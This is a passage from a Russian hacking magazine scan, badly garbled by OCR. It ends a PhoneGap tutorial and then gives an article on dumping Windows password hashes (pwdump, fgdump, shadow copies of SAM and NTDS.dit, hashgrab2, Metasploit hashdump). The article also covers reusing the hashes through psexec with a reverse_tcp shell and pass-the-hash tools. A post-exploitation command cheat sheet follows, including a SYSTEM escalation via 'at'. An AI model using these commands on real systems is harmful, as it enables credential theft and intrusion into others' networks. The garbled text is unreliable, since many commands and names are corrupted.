кусачая: $199 в год за лицензию для одной платформы и $349 в год 
для І05 и АпсІгоісІ. Согопа предлагает свою ЮЕ и эмуляторы устройств. 
Приложения под Согопа пишут на языке, похожем на ЭаѵаЗсгірІ. 
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Работающее РЬопебар-приложение 

приложение на ІОБ, необходимо быть авторизированным разработ- 
чиком І05 (другими словами, быть подписанным на ІОБ Беѵеіорег 
Ргодгат). Этим придется заморочиться только в случае разра- 
ботки приложений для продукции Арріе, с другими платформами 
(АпсІгоісІ, ѴѴіпсІоѵѵз Рбопе) все намного проще. У тех, кто обучается 
в вузе, есть шанс получить доступ к программе бесплатно благо- 
даря каким-нибудь льготам. Все остальные должны платить $99 
в год для участия в программе. Арріе выдает сертификат, которым 
ты сможешь подписывать свой код. Подписанное приложение 
разрешается запускать на ІОБ и распространять в Арр Біоге. Если 
ты не студент, а $99 для невинных экспериментов тебе пока жалко, 
то есть и другой способ — обмануть систему. Ты можешь создать 
самоподписанный сертификат для верификации кода и запу- 
стить мобильную программу на джейлбрейкнутом І05-устройстве 
(не буду на этом останавливаться, потому что все максимально 
подробно расписано в этой статье: ЬіІ.Іѵ/іРбхАІ ). Так или иначе, 
ты вскоре увидишь работающее приложение на экране своего 
мобильного телефона. Останавливай секундомер. Сколько времени 
у тебя на это ушло? 

ЗАКЛЮЧЕНИЕ 

Мы создали простое мобильное веб-приложение и в несколько 
простых шагов портировали его на платформу ІОБ с помощью 
РбопеОар. Мы не написали ни строчки кода на ОЬ)есІіѵе-С, 
но получили программу приличного качества, потратив минимум 
времени на перенос и изучение АРІ РбопеЗар. Если ты пред- 
почитаешь другую платформу, например АпсІгоісІ или ѴѴіпсІоѵѵз 
МоЬіІе 7, то ты так же легко, без каких-либо изменений под эти 
платформы, сможешь собрать наше приложение (для каждой 
из них есть хороший вводный мануал и видеоурок: рбопедар. 

). Чтобы убедиться в состоятельности платформы, 
можно посмотреть на уже готовые приложения на РЬопеСар, 
которые разработчики технологии собрали в специальной га- 
лерее ( рЬопедар.сот/аррз ). По факту РЬопеСар — это идеаль- 
ная платформа для создания как минимум прототипа будущего 
приложения. Ее главными преимуществами являются быстрота 
и минимум затратат, чем активно пользуются стартапы, которые 
во всех отношениях ограничены в ресурсах. Если приложение 
попрет, а внутренности на НТМІ_+Э5тебя по какой-то причине 
перестанут устраивать, всегда можно будет портировать при- 
ложение на нативный язык. Не могу не сказать, что РЬопеСар 
изначально разрабатывался компанией N ііоЬі как открытый 
проект (репозиторий располагается на СііНиЬ: діІбиЬ.сот/ 
рЬопедар ). Исходники и дальше будут оставаться открытым, хотя 
в октябре прошлого года компанию N ііоЬі купил АбоЬе. Нужно 
ли говорить, какие перспективы появляются у проекта при под- 
держке в лице такого гиганта? НЕ 
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УДОВНЫЙ ФОРМАТ. 

СОЗДАН СО ВКУСОМ. 






Реклама. Товар произведен в соответствии с Техническим Регламентом на табачную продукцию. 






РС20ЫЕ 



Антон «Апі» Жуков (а.гИикоѵйгеаІ.хакер.ги) 






ПРИГОТОВЛЕНИЯ „ 
ѴѴІЫООѴѴЗ-ПАРОЛЕИ 



КАК СДАМПИТЬ И 
ИСПОЛЬЗОВАТЬ ХЕШИ 
ПАРОЛЕЙ ОТ УЧЕТОК 
ѴУІИ00ѴУ5-СИСТЕМЫ 



Эта статья представляет собой полный 
сборник рецептов, описывающих, как 
сдампить хеши пользовательских паролей, 
восстановить исходный пасс путем 
выполнения брутфорса и получить с помощью 
извлеченного хеша доступ к защищенным 
ресурсам, используя недоработки протокола 
аутентификации І\ІТІ_М. Минимум теории — 
только практика. Мы собрали все в одном 
месте и создали полный мануал. 




ГДЕ ПАРОЛИ? 

Сразу отвечу на вопрос о том, где хранятся хеши паролей в системе. В 
общем случае их можно извлечь из трех мест: 

• из локальной 5АМ-базы, где хранятся І_М/І\ІТІ_М-хеши локальных 
пользователей; 

• из кеша І_5А, в который попадают І_М/МТІ_М-хеши доменных поль- 
зователей, стираемые после перезагрузки; 

• из специального кеша, где сохраняются М5СасЬе-хеши паролей 
десяти последних пользователей, которые авторизовались на дан- 
ном хосте (пароли кешируются, чтобы можно было войти в систему, 
если связь с доменом временно отсутствует). 

Если используется контроллер домена, есть еще Ай-хранилище. 
Важно понимать одно: из каждого указанного места пароли можно 
сдампить! Большинство приведенных ниже приемов давно извест- 
ны, но мы решили сделать своего рода полный сборник рецептов, к 
которому ты всегда сможешь обратиться при необходимости. Ниже 7 
готовых к употреблению рецептов. 



1 


РМШМР 


1 


И РбйІІМР 



Начнем с ситуации, когда у нас есть физический доступ к интересующей 
нас системе. В этом случае І\ІТІ_М/І_М-хеши можно сдампить с помощью 
специальных утилит. В большинстве своем эти тулзы требуют высоких 
привилегий, так как они необходимы для йИ-инжекта с помощью 
БеОеЬидРгіѵіІеде. Будем для простоты считать, что у нас есть аккаунт с 
правами администратора (а еще лучше І\ІТ АІІТН0РІТУ\5У5ТЕМ). 

Если имеется физический доступ, сдамить хеши довольно просто: 
есть много способов, к тому же всегда можно загрузить с флешки 
(или ЫѵеСО), например, Коп-Вооі ( ѵѵѵѵѵѵ.ріоІтЬапіа.сот/аІІ/коп-ЬооІ: ). 
чтобы войти в систему под любым пользователем. Есть и много дру- 
гих хаков (в том числе для повышения привилегий до І\ІТ АІІТНОРІТУ\ 
5У5ТЕМ с локального админа), о которых мы не раз писали в рубрике 
ЕазуНаск в прошлом году. Но вернемся к процессу извлечения 
хешей. Самыми известными утилитами для создания дампа хешей 
являются рѵѵбитр ( ѵѵѵѵѵѵ.і : оо^и5.пеі/~Л22дід/рѵѵсІитр ) и {дбштр ( ѵѵѵѵѵѵ. 
Гооіи5.пеіМі22дідЛдс1итр ). Работать с этими тулзами достаточно 
просто, да и по функционалу они очень похожи. Для дампа хешей до- 
статочно просто запустить проги: 

рисіитр 1оса1Но5Іі 
-р§сІитр.ехе 

Первая утилита выводит найденные хеши непосредственно в 
консоль. Вторая же сохраняет результат в файлах 127.0.0.1.РѴѴОІІМР 
(хеши паролей локальных пользователей) и 1 27.0.0. 1.САСНЕйІІМР 
(закешированные хеши паролей доменных пользователей). 
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Семь рецептов приготовления ѴѴіпбоѵѵз-паролей 



Одна из наиболее интересных опций, которую поддерживают обе 
утилиты, позволяет дампить хеши с удаленных машин. Чтобы провер- 
нуть этот фокус, скажем, с помощью рѵѵбитр, надо выполнить: 

> рмбитр -о туЕаг^еІ: . Іо? -и МѴООМАІІѴІХзотеизег -р \ 

' Іатераззмогб ' 10.1.1.1 

Здесь 10.1.1.1 — адрес удаленной машины, МѴООМАІІ\І\ 
зотеизег — аккаунт пользователя, Іатераззѵѵогб — пароль пользо- 
вателя, а туіагдеі.іод — файл для сохранения результатов. В отличие 
от рѵѵбитр, {дбитр умеет дампить хеши не только с одной машины, а 
сразу с нескольких: 

> -Р^битр.ехе --Р Ііозіібіе.ііхі: -и МУРОМАІІМХ зотеизег -Т 10 

В данном случае ЬозШе.М — файл, содержащий список хостов, «-Т 
1 0» — количество параллельно работающих потоков. Полученный хеш 
можно попробовать сбрутфорсить с помощью специальных утилит, чтобы 
узнать исходный пасс (ищи целую подборку подходящих тулз на врезке). 

Примечательно, что некоторые из них для большего удобства под- 
держивают формат вывода Ідбитр.ехе. 



Если утилитам вроде рѵѵбитр и {дбитр сто лет в обед, то способ дам- 
пинга паролей, о котором пойдет речь далее, появился относительно 
недавно. Что круче всего, он вообще не требует сторонних инстру- 
ментов и задействует только возможности самой системы. Как мы 
уже знаем, хеши паролей локальных пользователей хранятся в том 
числе и в файле 5АМ, правда, в зашифрованном виде. Поэтому, чтобы 
прочитать их, требуется еще один файл — 5У5ТЕМ. Эти два файла 
представляют собой системные ветви реестра, которые ОС постоянно 
использует, поэтому доступ к ним невозможен даже из-под админи- 
стратора. Из-за этого многим приложениям, которые извлекают хеши 
паролей, приходится идти на ухищрения, чтобы получить доступ к 
этим ветвям. Мы же, чтобы скопировать эти файлы, воспользуемся 
легальным механизмом, который предоставляет сама ОС. Этот меха- 
низм, позволяющий делать «мгновенный снимок» тома, называется 
Ѵоіите БЬабоѵѵ Сору Эегѵісе (теневое копирование тома). Он появился 
в ОС ѴѴіпбоѵѵз начиная с версий ХР и Эегѵег 2003. Эта технология 
автоматически используется, например, при создании архива Зузіет 
51а1е с помощью утилиты піЬаскир или при создании снимка для 
общей папки (Ѵоіите Збабоѵѵ Сору Ьг Збагеб Роібегз). Суть идеи 
состоит в том, что при теневом копировании будут созданы копии 
важных системных файлов (в частности, 5АМ и 5У5ТЕМ), доступ к 
которым мы сможем легко получить. Чтобы избавиться от лишней 



ДАМП ПАРОЛЕЙ С ПОМОЩЬЮ 
ѴОЫІМЕ ЗНАЬОѴѴ СОРУ 5ЕРѴІСЕ 



ВЫКЛЮЧАЕМ КЕШИРОВАНИЕ 
ХЕШЕЙ ПАРОЛЕЙ 



Как известно, ѴѴіпбоѵѵз кешируетхеши паролей и логины доменных 
пользователей, что позволяетзайти на машину, если контроллер до- 
мена отключен и недоступен. Если пользователь вводит правильный 
логин и пароль, то при авторизации система сохраняетхеш пароля на 
диске. Какты сам понимаешь, держать такие данные на диске — не 
самое лучшее решение с точки зрения безопасности, так что эту функ- 
цию лучше отключить. Для этого необходимо установить ключ НКЕУ_ 
Е0САЕ_МАСНІЫЕ\50РТѴѴАРЕ\Місго5о11\ѴѴіпбоѵѵ5 ЫТ\СиггепіѴег5Іоп\ 
ѴѴіпІодоп\сасбебІодоп5соиЩ в значение «0». Затем надо перезагрузить 
компьютер, чтобы удалить все закешированные ранее пароли. С этого 
момента винда не будет кешировать пароли пользователей домена. 




Получаем хэши локальных пользователей при помощи рѵѵсіитр 




Подменяем свои данные на данные другого пользователя при помощи ѴѴіпсІоѵѵз 
Сгесіепііаіз ЕіШог (ЖЕ) 



работы в консоли, воспользуемся небольшим скриптиком ѵззоѵѵп.ѵЬз 
( іооІз.ІаптазіегбЗ.сот/ѵззоѵѵп.ѵЬз ). управляющим созданием копий. 
Сценарий ты найдешь на нашем диске. Для начала запускаем сервис 
теневого копирования: сзсгірі: ѵззомп.ѵЬз /зіагі:. Затем создаем 
новую теневую копию: сзсгірі: ѵззомп.ѵЬз /сгеаіе. Теперь смотрим 
список всех теневых копий: сзсгірі: ѵззоып.ѵЬз /Из*. 

Созданная нами копия будет самой последней. Из всей инфор- 
мации нас интересует йеѵісе оЬіесі со значением «\\?\6І_0ВАІ_Р00Т\ 
0еѵісе\НагббізкѴоІите5бабоѵѵСору14» (здесь 14 — номер теневой 
копии). Дальнейшие манипуляции предельно просты. 

1. Копируем интересующие нас файлы: 



сору \\?\СЮВАІК00Т\0еѵісе\НагббізкѴо1ите5бабоыСору14\ 
ыіпбоыз\зуз1:ет32\соп1і§\5Ѵ5ТЕМ . 

сору \\?\СЮВАІК00Т\0еѵісе\НагббізкѴо1ите5бабоіл/Сору14\ 
ыіпбош5\5Ѵ 5І:ет3 2\сопбе\5АМ . 



2 . Все,теперьэти файлы можно скормить какой-нибудьутилите типа 
ЭАМІпзібе ( іпзіберго.сот/гиз/затіпзібе.збіті ) для расшифровки 
полученныххешей. 



З ДАМП ПАРОЛЕЙ ВСЕХ 

ПОЛЬЗОВАТЕЛЕЙ ДОМЕНА! 



Интересно, что используя предыдущий прием, можно легко слить 
хеши паролей не только локальных, но и вообще всех доменных 
пользователей! Правда, только если у нас есть доступ к контроллеру 
домена. Предположим, мы создали теневую копию и скопировали 
файлы 5АМ и 5У5ТЕМ. Асііѵе йігесіогу хранит данные о пользовате- 
лях в файле ЫТ05.0ІТ, так что нужно скопировать и его: 

сору \\?\СЮВАІК00Т\0еѵісе\НагббізкѴо1ите5бабоыСору14\ 
ыіпбоыз\п1:б5\п1:б5 .біі: . 

Данные о пользователях хранятся в зашифрованном виде, поэто- 
му их нужно будет расшифровывать с помощью файла 5У5ТЕМ. Итак, 
что мы имеем? У нас есть файлы 5У5ТЕМ и N105. йІТ, но как нам 
получить список пользователей и их хешей? До недавнего времени 
это было непросто, так как бесплатных утилит, способных распар- 
сить N105.011 и расшифровать хеши, не существовало. Но недавно 
исследователь по имени СзаЬа Вагіа выпустил тулкит, который 
умеет разбирать файл ЫТ05.0ІТ и извлекать оттуда хеши. Весь 
инструментарий доступен по адресу сзаЬаЬагіа.сот/боѵѵпІоабз/ 
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пісіб сіитр ЬазЬ.гір . Посмотрим, как этот тулкит работает. Для 
дальнейших манипуляций будем использовать ВаскТгаскб (подой- 
дет любой другой Ыпих-дистрибутив), хотя все то же самое можно 
провернуть и под виндой. Загружаемся, скачиваем архив тулкита и 
распаковываем его. Далее собираем библиотеку ІіЬезесІЬ: 

ссі ІіЬезесІЬ 
сбтосі +х сопб§иге 
./сопб§иге && таке 

Теперь можно приступать к дампу хэшей. Прежде всего извлекаем 
таблицу, содержащую зашифрованные данные: 

ссі ѳбѳсіЫіооіб 

./евесІЬсІитрІіаБІі . . /піісіб . сііі: 

У нас появился файл /ІіЬезебЬ/езебЬіооІз/пІбз.сІіТехрогі/сІаІаІаЫе. 
Уже профит. Теперь его надо расшифровать при помощи ключа, кото- 
рый содержится в 5У5ТЕМ: 

ссі . ./ . ./сгесИитр/ 

руЫіоп . /сізсіитр.ру . ./5У5ТЕМ 

. . /ІіЬезесІЬ/езесІЫіооІз/пІісІз.сІіІі.ехрогІі/сІаІіаІіаЫе 

Готово! На выходе получаем хеши всех пользователей домена! 
Интересно, что можно извлечь еще и предыдущие пароли пользо- 
вателей (их хеши). Для этого в инструментарии имеется отдельная 
утилита, которую легко задействовать: руТИоп ./сІзсІитрІіІБІіогу.ру 
. ./БуБТет . ./1іЬе5есІЬ/е5есІЬТооІ5/пТсІ5.сІі1:.ехрог1:/сІа1:а1:аЫе. 

Если их удастся взломать, вполне можно проследить закономер- 
ность, в соответствии с которой пользователь меняет свои пароли 
(она очень часто существует). 



А 


НА5Н6РАВ2 + 


Ц 


5АМОІІМР2 



Чтобы сдампить хеши, необязательно логиниться в системе. 

Опять же, если есть физический доступ к компьютеру, то можно 
не только загрузить с ЫѵеСО утилиту для сброса пароля (скажем, 
ОІТІіпе І\ІТ РаззѵѵогсІ & Педізігу Есіііог), но и легко сдампить хеши с 
помощью специального софта — еще бы, ведь никакие политики 
доступа к системным файлам тут не действуют. Мы воспользуем- 
ся утилитами НазЫЗгаЬ2 ( рѵ1337.де1-гооПсотАооІ5/ЬазЬдгаЬ2. 
гір ) и затзитр2 ( зоигсеі : огде.пеі/рго]есІ5/ор1"ісгаск/П1е5/ 
затсІитр2/2.0.1 ). которые можно запустить практически из любого 
ЫѵеСО-дистрибутива. НазЬСгаЬ2 автоматически монтирует все 
ѴѴіпсІоѵѵз-разделы, которые может найти, и при помощи затсІштр2 
извлекает логины и хеши паролей из файлов БАМ и 5Ѵ5ТЕМ. Вот 



ъ # ф «л ® и а 




Расшифровываем пароли при помощи БАМІпзісіе 

как это выглядит на практике: 

> біісіо ^Ііа5Іі§паЬ2. ру 
НазІіСпаЬ ѵ2.0 Ьу зЗтуѲп 
Ы=1=р : //Іп1:егІ\І0Т . пеі: 

СоітСасС: Ки$Н4скЗК[а1=]^таі1[сІо1=]сот 
[*] МоигтЕесІ /сіеѵ/зсіаі 1=о /тп1і/дотАТ8 
[*] МоигтЕесІ /сіѳѵ/бсіЫ 1=о /тп1і/А2іл/ЗЦ5 
[?] Соруіп§ БАМ апсі 5У5ТЕМ бі ез . . . 

[*] 1)птоип1:іп% рап1=і1=іоп5 . . . 

[*] Ое1е1:іп§ тоипТ сІігесѣогіеБ . . . 

[*] Ое1е1:іп§ [ ' . /іотАТ8' ] 

>І І5 

Ііа5Іі^гаЬ2.ру дотАТ8.1:х1: 

>$ саі: . /іотАТ8.1=х1: 

АсІтіпІ5І:па1:ог : НА5Н 
6иеБІ=:501:НА$Н 
53ту0п : 1000 : НАБН 
Ноте6гоирЦ5еп$ : 1002 : НА5Н 

Полученные хеши тут же можно скормить брутфорсеру. 



С 


возможности 


Э 


МЕТА5РЮІТ 



Допустим теперь, что у нас нет физического доступа к компьютеру. Пусть 
вместо этого у нас имеется удаленный шелл и в идеале Меіегргеіег. В 
Меіазріоіі Егатеѵѵогкуже встроен функционал для извлечения списка 
пользователей и хешей паролей. Делается это в одну команду: 

те~Ьегрге~Ьег > пип ро5І:/ыіпсІоы5/^а1:Ііег/Ііа5ІісІитр 

В результате мы получаем список пользователей и хешей. Но 
останавливаться на достигнутом не стоит. Меіазріоіі — штука много- 
функциональная, поэтому можно попробовать использовать получен- 
ные хеши для доступа к другим компьютерам в сети жертвы — вдруг 
подойдут. Для этого пригодится модуль РзЕхес: 

те~Ьегрге~Ьег > изе ехр1оі1:/ыіпсІоы5/5тЬ/р5ехес 



ПРОГРАММЫ ДЛЯ ВЗЛОМАХЕШЕЙ 



БАМІпзісіе 

Пожалуй, самая популярная программа для взлома 
ІМИМ-хешей. Позволяет импортировать свыше де- 
сяти типов данных и использовать шесть видов атак 
для восстановления паролей пользователей. Код 
брутфорсера полностью написан на асме, что обе- 
спечивает очень высокую скорость перебора. Очень 
важно, что программа корректно извлекает имена 
и пароли пользователей ѴѴіпсіоѵѵб в национальных 
кодировках символов. 



Іт 2 пІсгаск 

ѵѵѵѵѵѵ.хтсоТг/Іт2пІсгаск/іпгіех.НітІ 

Небольшая программка, которая можетвыручить 
втрудный момент. Она позволяет взломать ЫТ- 
хеш, когда ЫЧ-парольуже известен. Вся фишка 
в том, что ЫЧ-пароль регистронезависимый, а 
ІЧТ — регистрозависимый и как раз по нему и 
происходитпроверка. Таким образом, еслиты 
знаешь, что ЬМ-пароль — АОМ I N ІБТРАТО Р, ноне 
знаешь, какиебуквызаглавные,а какиенетдебе 
поможетІт2пІсгаск. 



ідИазИдри 

ѵѵѵѵѵѵ.доІиЬеѵ.сот/НазНдри.Ніт 

Процесс подбора оченьтрудоем кий и занимает 
много времени. Поэтому, чтобы как-то егоуско- 
рить, целесообразно использовать ресурсы само- 
го мощного устройства в системе — видеокарты. 
Программа ідИазЬдри позволяетзадействовать 
СРІІ для взлома хешей Мй4, М05,5НА1, ІМИМ, 
Огасіе 1 1 д, МуБСИб, М55СИ. Если приэтом исполь- 
зовать атаку по словарю, успешный результат 
можно будет получить намного быстрее. 
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Семь рецептов приготовления ѴѴіпсІоѵѵз-паролей 



теѣегргеіег > веі: рауіоасі ыіпсІоы5/те1:епрге1:ег/геѵег5е_1:ср 
теѣегрге-Ьег > зеі: гііобі: [адрес удаленного хоста] 
те~Ьегрге~Ьег > зеі: зтЬразз [ранее полученный хеш 
пользователя] 

те*егрге*ег > зеі: зтЬивег [логин пользователя] 
теѣегргеѣег > веі: ІМозІ: [адрес локальной машины] 
те-Ьегрге-Ьег > ехрі оіі: 

те~Сегрге~Сег > БІіеІІ - получили шелл на удаленной машине 



Как видишь, все происходит автоматически, без всяких сложно- 
стей. Чтобы дальше ковыряться с любыми файлами системы, полезно 
сразу поднять права. Получить их можно прямо из Метерпретера, в 
котором есть простая команда деізузіет. Этот модуль попробует под- 
нять права в ОС, используя уязвимости М509-012, а также нашумев- 
шую уязвимость М510-015 (КіТгарСЮ) и не только. 




Саіп&АЬеІ — еще одна замечательная тулза для брутфорса ЫТМІ. хэшей 

(кроме этого поддерживает взлом хэшей большого количества других алгоритмов) 



6 


ТЕХНИКАІ І 


7 


ѴѴІШ0ѴѴ5 


РА55-ТНЕ-НА5Н 




СКЕОЕІТПАІ-Б ЕйІТОР 



В обеих реализациях протокола І\ІТІ_М есть большая дырка. Для 
аутентификации достаточно знать только хеш пользователя, то есть 
даже брутить ничего не надо. Достал хеш — и можешь лазить по 
сетке с правами скомпрометированного юзера :). Соответствую- 
щий метод, который носит название Разз ТЬе НазЬ, разработан аж 
в 1997 году. Одной из его самых известных реализацией является 
набор утилит Разз-іЬе-Назб ТооІкіТ В него входит три утилиты ( озз. 
согезесипІѵ.сот/рго]есЫрзб1:оо1кі1.І"іІппІ ): ІАМ.ЕХЕ, ѴѴН05ТНЕРЕ.ЕХЕ 
и 6ЕІМНА5Н.ЕХЕ. Как видно из названия, 6ЕІМНА5Н предназначена 
для генерации І_М- и ЫТ-хешей переданного ей пароля. ѴѴН05ТНЕРЕ. 
ЕХЕ, выводит всю информацию о логин-сессиях, которую операци- 
онная система хранит в памяти. Тулза отображает информацию о 
пользователях, которые на данный момент залогинены в системе: 
имя юзера, домен/рабочую группу и І\ІТІ_М-хеши пароля. Утилита ІАМ. 
ЕХЕ позволяет прикинуться другим пользователем при получении 
доступа к какой-либо папке на удаленной машине, подменяя данные 
текущего пользователя (логин, хеш пароля, домен и т. д.), когда они 
в закешированном виде отправляются удаленной системе, чтобы 
она могла идентифицировать пользователя и решить, предоставлять 
ли ему доступ к запрашиваемому ресурсу. После успешной подмены 
все сетевые соединения с удаленными серверами, осуществляющие 
аутентификацию с помощью І\ІТІ_М-хешей, используют подмененные 
данные, что позволяет получить доступ к «чужой» шаре. Рассмотрим 
примерный сценарий использования: 

• мііозііііеге.ехе - получаем данные всех залогиненных 
пользователей; 

• гат.ехе -Ь ас!тгпг5І:га1:ог:тусІотагп:ААРЗВ435В514Ѳ4ЕЕААРЗВ 
435В514Ѳ4ЕЕ : 31Р6СЕЕѲР16АЕ931В73С59Р7ЕѲСѲ89СѲ - подменяем 
свои данные на данные другого пользователя. 

Вот, собственно, и все, теперь мы имеем права для доступа к 
сетевым ресурсам другого пользователя. 



ѴѴСЕ представляет собой аналог Разз-іЬе-НазЬ ТооІкіТа, однако здесь 
весь функционал сосредоточен в одном исполняемом файле. Этот 
инструмент мне нравится больше. При запуске без параметров при- 
ложение возвращает список пользователей, залогиненных на данный 
момент в системе (утилита вытаскивает І\ІТІ_М/І_М-хеши из памяти): 

мсе.ехе -1 



После этого можно выбрать из них подходящего кандидата для 
наших черных дел и воспользоваться его данными. Допустим, нам 
нужно подменить свои данные на данные другого пользователя и за- 
пустить какую-нибудь программу якобы уже из-под него: 

шсе.ехе -5 <и5егпате>:<гіотаіп>:<1шИа5Н>:<п1:На5Н> \ 

-с < рго^гат> . 

Тогда выполняем следующую команду: 

мсе.ехе -5 изег :Ѵіс1:іщ:1Р27АС0Е849935ВѲАА03В435В514Ѳ4ЕЕ 
: 579110С49145015С47ЕСР267657Р3174 -с "с:\Рго^гат РіІезХ 
ІпТегпеІ: Ехр1огег\іехр1оге.ехе" 

Здесь «-5» «добавляет» нового пользователя с именем изег и до- 
меном Ѵісііт, за которыми следует І_М- и І\ІТІ_М-хеш, а «-с» указыва- 
ет, какую программу следует запустить под этим пользователем. Как 
видишь, все довольно просто. :) 

ЗАКЛЮЧЕНИЕ 

Вот, собственно, и все. Мы рассмотрели все наиболее часто встре- 
чающиеся ситуации. На самом деле существует гораздо больше 
способов, позволяющих увести (например, с помощью снифера) и 
использовать хеши, но в большинстве своем они сводятся к рассмо- 
тренным выше методам. ПС 



СІЮА-МиІМогсег 

ѵѵщщ.сгѵрІоНаге.сот/тиІШогсег.рНр 

Еще одна утилита, использующая мощь графи- 
ческой карты для взлома различныххешей. Как 
можно догадаться по названию, ориентирована 
на видеокарты фирмы пѴісІіа. Поддерживает вну- 
шительный списокхешей: Мйб, І\ІТІ_М, Мй4, 5НА1, 
М550І_, 5НА, М05_Р5: тб5($ра55.$5аІ*), М05_5Р: 
тсі5($5аІЕ$ра55),55НА:Ьа5е64(5Ьа1 ($раз5.$5аК)), 
00ПВІ.ЕМ05: тсІ5(тсІ5($ра55)), ТРІРІ.ЕМ05, 1_М: 
МісгозоН І_апМап ЬазЬ и др. 



орНсгаск 

орНсгаск.Боигсеіогде.пеІ 

Программадля восстановления паролей ѴѴіпсІоѵѵз 
с использованием гаіпЬоѵѵ-таблиц.Втакихтабли- 
цах в особой форме содержатся предварительно 
рассчитанные хеши для разных паролей. Таким 
образом, найдязаданныйхэш втаблице, мы бы- 
стро получаем готовый пароль. Успех напрямую 
зависитотразмерагаіпЬоѵѵ-таблицы.Такчто, 
если нехочетсябрутитьпарольтупым перебором, 
рекомендую скачатьтабличку побольше. 



ЭоЬпІІіеВіррег 

ѵѵѵѵѵѵ.орепѵѵаІІ.сопп 

Официальная версия этого легендарного брутфор- 
сера паролей не поддерживает взлом І\ІТІ_М-хешей, 
но энтузиасты не могли не прокачать функционал 
любимой хак-тулзы. Выпущен специальныйщтЬо- 
патч, который позволяет брутфорсить более десяти 
дополнительных видов хешей, втом числе ЫТІ_М. 

На офсайте есть каксІНТы, которые можно наложить 
на оригинальные сорцы, так и готовые к использо- 
ванию бинарники (втомчиследляѵѵіп32). 
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И Правила 
постэксплуата ци и 



ЧТО ДЕЛАТ^І ШЕЛЛОМ ЖІЦрОЖЗ-СИСТЕМЫ? 



Выяснилось страшное. Многие не знают, что делать, получив шелл к удаленной ѴѴіпсІо\л/5-системе, как 
с ним быть? Консоль пугает своей простотой и приводит в растерянность. Что нужно знать пентестеру, 
чтобы чувствовать себя комфортнее? Наши ответы мы оформили в виде таблиц-шпаргалок, разбив 
заготовки полезных команд на несколько разделов. 



Г _ 



ш 



РАБОТА 
С СЕТЬЮ 



После получения доступа к одной системе пентестерам и злоумышленникам зачастую удается развить атаку и до- 
браться до других рабочих станций и серверов в локальной сети. Для изучения топологии и структуры сети, однако, 
пригодны не только известные сканеры безопасности (вроде птар, который нужно еще как-то загрузить на машину), 
но и некоторые стандартные команды системы. 



ірсопіід /аМ 
ірсопЯд /сіізріаусіпз 

пеізіаі -паЬо 

пеізіаі -з -р [ісріисіріісртіір] 

пеізіаі -г 
гоиіе ргіпі 

пеізіаі -па I Ііпгізіг :445 
пеі ѵіеѵѵ 

пеі изег %и$ЕРМАМЕ% /сіотаіп 

пеі ассоипіз 

пеі ассоипіз /сіотаіп 

пеі Іосаідгоир асітіпізігаіогз 

пеі Іосаідгоир асітіпізігаіогз /сіотаіп 

пеі сопіід ѵѵогкзіаііоп 

пеі зИаге 

агр -а 

Іуре %ѴѴІМ0ІР%\5узІет32\сІгіѵег5\еІс\ 
Иозіз 



Отображает полную информацию о сетевых адаптерах. 

Отображает локальный 0Ы5-кеш. 

Отображает все сетевые ТСР/ІЮР-соединения. Ключ «-Ь» позволяет сразу получить еще и имена процессов, 
которыми эти соединения были установлены, однако эта команда требует администраторских прав. 

Команда пеігіаі отображает статистику и список соединений по какому-либо протоколу (ТСР, ІЮР, ІСМР, ІР). 

Для вывода таблицы маршрутизации пригодна любая из этих команд. С их помощью можно получить 
информацию о других подсетях и статических маршрутах. 

Вот таким образом можно посмотреть, какие соединения установлены на портах, содержащих значения 445. 

С помощью этой команды через 5МВ можно найти все хосты в текущей рабочей группе (домене). 

Команда выводит информацию о текущем пользователе домена (убери ключ '/ 6000310 ', чтобы получить данные 
о локальном юзере). Помимо всего прочего, отображаются членство в группах, время последней установки 
пароля, скрипты для автозапуска и т. д. 

Отображает политику паролей для текущей системы (она может быть переопределена политикой домена). 
Показывает политику паролей в домене. 

Отображает членов локальной группы «Администраторы». 

Отображает членов группы «Администраторы» для домена. 

Отображает такую информацию, как имя ЫеіВІОВ, имя компьютера, пользователя, домена, рабочей группы и т. д. 
Отображает все 5МВ-шары. 

Отображает АРР-таблицу локальной машины. 

Показывает содержимое файла Ьозіз. 
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Правила постэксплуатации 



ИНФОРМАЦИЯ 
О СИСТЕМЕ 



Одна из первостепенных задач после получения шелла к удаленному хосту— собрать максимум информации о системе. 
Приведенные ниже команды помогут тебе по крупинке воссоздать полный «облик» удаленной машины: с какой ОС ты име- 
ешь дело (от этого будет зависеть возможность использования тех или иных команд), какие сервисы запущены, какие задачи 
определены в планировщике, под каким пользователем выполнен вход в систему, какие у него есть привилегии и т. д. 



Команда 



Описание 



ѵѵііоаті 
ѵѵііоаті /аМ 

дѵѵіпзіа 



зеі 



зузіетіпіо (ХР+) 



Яргосезз 91 



Чаррзгѵ 

зсіііазкз Л|иегу По сзѵ /ѵ > 
%ТЕМР% 



Под каким пользователем выполнен вход в систему? Это команда отображает текущего пользователя и домен. Ключ 
’/аІГ позволяет дополнительно получить 5Ю юзера, а также имена и 5Ю групп, к которым он принадлежит (вдруг 
в этом списке будет группа «Администраторы»?). 

С сервером, возможно, кто-то работает удаленно. Чтобы узнать об активных РОР-сессиях (подключениях к удаленному 
рабочему столу), можно использовать эту команду. 

Команда возвращает версию ядра (как ипате в никсах), что позволяет точно определить, с какой ОС ты имеешь дело. 

Переменные окружения — важная настройка системы. Команда 5ЕТ выводит их в виде списка, в котором для каждой 
переменной указано значение. Обратить внимание стоит в первую очередь на ІІ5ЕР00МАІІЧ, ІІ5ЕРЫАМЕ, ІІ5ЕРРР0- 
РІІ_Е, НОМЕРАТН, Ю60Ы5ЕРѴЕР, СОМРІІТЕРЫАМЕ, АРРРАТА, и АІ_Ш5ЕРРРЮРІІ_Е. Названия говорят сами за себя. 

Эта команда выводит множество сведений о системе, включая имена хоста и домена, версию биоса, название сервера 
для входа в сеть, настройки сетевых интерфейсов, а также данные об установленных в системе патчах. 

Если хочешь вывести список процессов в наиболее удобном для чтения виде, надо взять на вооружение эту команду. 
Для каждого процесса ты получишь имя пользователя, Ю сессии, РЮ и название бинарника. 

Эта команда выводит список терминальных сервисов, которые доступны в домене. 

Выводит все сервисы в удобном формате сзѵ, после чего их можно слить и более тщательно просмотреть. 



аі 

зсНІазкз (ХР+) 

пеі зіагі или зс диегу 



Команда, запущенная без параметров, показывает все задачи, запланированные с помощью встроенного 
планировщика. Но главная фишка этой команды в том, что ее можно использовать для поднятия привилегий до 5Ѵ5- 
ТЕМ (работает даже на ѴѴіп7х64). Например, команда, выполняющая ВАТ-файл с1о_зотеіЫпд.ЬаІ с привилегиями 
5У5ТЕМ в 15:41, будет выглядеть так: 
а! 15:41 /іпііегасіііѵе "сі : \реп1:е5І:\сІо_5оте1:Іііп§. Ьаі:" 

